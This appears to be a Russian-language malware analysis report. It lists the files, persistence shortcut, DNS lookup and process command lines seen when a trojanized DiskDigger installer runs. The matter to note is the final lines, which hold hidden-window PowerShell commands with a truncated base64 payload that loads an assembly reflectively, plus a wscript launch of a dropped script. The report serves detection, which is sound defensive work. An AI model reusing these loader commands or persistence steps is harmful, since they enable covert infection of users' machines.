Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\chromium.ini.lnk
- %APPDATA%\diskdigger 1.23.31.2917.exe
- %APPDATA%\id.js
- %TEMP%\is-8oahq.tmp\diskdigger 1.23.31.2917.tmp
- %TEMP%\is-0eb7q.tmp\_isetup\_regdll.tmp
- %TEMP%\is-0eb7q.tmp\_isetup\_setup64.tmp
- %TEMP%\is-0eb7q.tmp\_isetup\_shfoldr.dll
- %TEMP%\is-0eb7q.tmp\istask.dll
- %TEMP%\is-0eb7q.tmp\vclstylesinno.dll
- %TEMP%\is-0eb7q.tmp\metroblue.vsf
- %TEMP%\is-0eb7q.tmp\wizardform.bitmapimage1.bmp
- %HOMEPATH%\appdata\chromium.js
- DNS ASK si##j.space
- ClassName: 'Edit' WindowName: ''
- '%APPDATA%\diskdigger 1.23.31.2917.exe'
- '%TEMP%\is-8oahq.tmp\diskdigger 1.23.31.2917.tmp' /SL5="$90216,2005661,64512,%APPDATA%\DiskDigger 1.23.31.2917.exe"
- '%WINDIR%\syswow64\wscript.exe' "%APPDATA%\ID.js"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...' (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -noexit -e IAAgAHMAbABlAGUAcAAgADgAOwAgAFsAQQBwAHAARABvAG0AYQBpAG4AXQA6ADoAQwB1AHIAcgBlAG4AdABEAG8AbQBhAGkAbgAuAEwAbwBhAGQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBiAGEAcwBlADYANABTAHQAcgBpAG...